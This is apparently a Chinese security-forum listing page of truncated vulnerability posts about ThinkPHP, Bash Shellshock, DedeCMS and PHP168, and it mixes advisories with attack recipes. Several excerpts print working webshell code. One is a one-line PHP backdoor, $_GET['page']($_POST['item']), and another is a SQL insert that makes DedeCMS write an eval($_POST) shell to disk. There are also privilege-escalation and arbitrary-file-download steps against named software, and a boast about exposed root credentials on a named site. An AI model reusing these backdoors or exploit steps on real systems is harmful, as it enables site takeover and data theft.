最新漏洞

ThinkPHP缓存函数设计缺陷导致Getshell漏洞

 ThinkPHP是一个开源、快速、兼容而且简单的轻量级国产PHP开发框架,由于ThinkPHP简洁实用、出色的性能和至简的代码,成为国内站长或企业网站使用较多的web框架。 近期,国内安全研究人员发现ThinkPHP在使用缓存的时候,由于缓存函数缺陷,导致可以远程Getshell,存在高危安全风险。 具体详情如下: 漏洞编号: 暂无 漏洞名称: ThinkPHP 缓存函数设计缺陷导致Getshell漏洞 官方评级: 高危 漏洞描述: 当用户使用了ThinkPHP 3.2.3-5.0.10版本并启用了缓存功能,远程攻击者可以使用精心构造的数据远程POST提交,触发该漏洞,并成功获取网站权限。 漏洞利用条件和方式: 启用缓存功能 远程利用 漏洞影响范围: ThinkPHP 3.2.3-5.0.10版本 漏洞检测: 检查是否使用了ThinkPHP 3.2.3-5.0.10版本并启用了缓存功能 漏洞修复建议(或缓解措施): 厂商暂未发布补丁,可以使用方式进行...

SSH bash紧急安全补丁以及修复办法编译打补丁升级bash修复漏洞

漏洞详情页面:http://seclists.org/oss-sec/2014/q3/650 漏洞级别:非常严重 漏洞信息: 1.测试是否存在漏洞,执行以下命令: env t='() { :;}; echo You are vulnerable.' bash -c "true" 复制代码 如果显示You are vulnerable,很遗憾,必须立即打上安全补丁修复 2.修复漏洞办法 Ubuntu or Debian 请执行 apt-get update apt-get upgrade ​ RedHat, CentOS or Fedora 请执行 yum clean all yum -y update bash 复制代码     先更新慢的 可以 手动 编译打补丁升级bash修复漏洞​ wget http://ftp.gnu.org/gnu/bash/bash-4.3.tar.gz tar zxf bash-4.3.tar.g...

PHP新型一句话后门

assert也可以直接执行php代码。 现在在本机模拟了下。 建一个post.html <form action = "test.php?page=assert" method = "post">  <input type = "text" name = "item" /> <input type = "submit" value = "运行" /> </form> 复制代码 复制代码 再建一个test.php <?php $_GET['page']($_POST['item']);  ?> 复制代码 复制代码 这个post.html在任何电脑上运行都可以,只要action的地址是那个test.php. 在输入框里输入: phpinfo(); 点击运行按钮, 尼玛 phpinfo就直接出来啦,太可怕了,这可以为所欲为了啊  ...

wanyx.com 爆源码 0DAY

著名单机游戏下载站 wanyx.com 今天偶然发现 直接爆 PHP 源代码   很容易就找到 配置文件,直接用的 root 账户。。。。 懒得提权了。 已经联系站长修复。

dedecms 5.7 Get Webshell ,大家注意安全!

网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell 前题条件,必须准备好自己的dede数据库,然后插入数据: 代码: insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'<?php eval($_POST[c]) ?>\');echo "OK";@fclose($fp);{/dede:php}'); 再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。 代码: <form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();"> <input type="text...

PHP168 V6.01 权限提升漏洞

影响版本: PHP168 V6.01 漏洞描述: PHP168整站是PHP领域当前功能最强大的建站系统,代码全部开源,可极其方便的进行二次开发,所有功能模块可以自由安装与删除,个人用户完全免费使用 HPCMS V6.01存在严重的安全问题 测试方法: 本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!注册一个帐户,进入会员中心。访问http://ssvdb.com/member/buygroup.php?job=buy&gid=3 你会看到如下字样。 你现在的级别是普通会员,你将要购买的级别是超级管理员,需要积分0 点击购买,如返回你现在级别是超级管理员等字样。返回会员中心查看一下 然后找到后台登录传shell即可SEBUG安全建议: 厂商补丁: PHP168 -------- 目前厂商已经提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:  

PHP168 V6.02整站系统远程执行任意代码漏洞

SEBUG-ID:20108 SEBUG-Appdir:Php168 发布时间:2010-09-10 影响版本: PHP168 V6.02 漏洞描述: PHP168在某些函数里运用了eval函数,但是某数组没有初试化,导致可以提交任意代码执行. 漏洞出在inc/function.inc.php里面.get_html_url()这个函数. function get_html_url(){ global $rsdb,$aid,$fidDB,$webdb,$fid,$page,$showHtml_Type,$Html_Type; $id=$aid; if($page<1){ $page=1; } $postdb[posttime]=$rsdb[posttime]; if($showHtml_Type[bencandy][$id]){ $filename_b=$showHtml_Type[bencandy][$id]; }elseif($fidDB[benca...

PHP168 V6 下载任意文件漏洞

今天翻了一下旧的文件,发现很久前的一个分析报告,然后到php168演试站测试了一下,居然漏洞依然存在? 漏洞相关文件HASH b912249a22b630c04f7ad65f8ba5a2f6   download.php 漏洞描述: 漏洞文件download.php $url=base64_decode($url);  //27行 $fileurl=str_replace($webdb[www_url],"",$url); if( eregi(".php$",$fileurl) && is_file(PHP168_PATH."$fileurl") ){  //只判断文件后辍是不是php,如果是php,而且存在这个文件,那么就提示出错,但问题就是出现在这里,在win环境下,文件后辍多出一个空格,文件一样显示存在的。就是利用这里,我们可以下载系统任意文件。         die(...

php168 v6.0拿shell漏洞

分两步 第一 do/下jsarticle.php文件  if(!eregi("^(hot|com|new|lastview|like|pic)$",$type)){  die("类型有误");  }  $FileName=dirname(__FILE__)."/../cache/jsarticle_cache/";  if($type==’like’){  $FileName.=floor($id/3000)."/";  }else{  unset($id);  }  $FileName.="{$type}_{$fid}_{$id}.php";  ..................  if(!is_dir(dirname($FileName))){  makepath(dirna...

DEDECMS v5.6 Final网站管理系统模板执行漏洞

影响版本: DEDECMS v5.6 Final 程序介绍: DedeCms 基于PHP+MySQL的技术开发,支持Windows、Linux、Unix等多种服务器平台,从2004年开始发布第一个版本开始,至今已经发布了五个大版本。DedeCms以简单、健壮、灵活、开源几大特点占领了国内CMS的大部份市场,目前已经有超过二十万个站点正在使用DedeCms或居于DedeCms核心,是目前国内应用最广泛的php类CMS系统。 漏洞分析: Dedecms V5.6 Final版本中的各个文件存在一系列问题,经过精心构造的含有恶意代表的模板内容可以通过用户后台的上传附件的功能上传上去,然后通过SQL注入修改附加表的模板路径为我们上传的模板路径,模板解析类:include/inc_archives_view.php没有对模板路径及名称做任何限制,则可以成功执行恶意代码。 1、member/article_edit.php文件(注入): //漏洞在member文件夹下普遍存在,$dede_addonfields是由用户提交的,可以被伪造,伪造成功即可带入sql语句,于...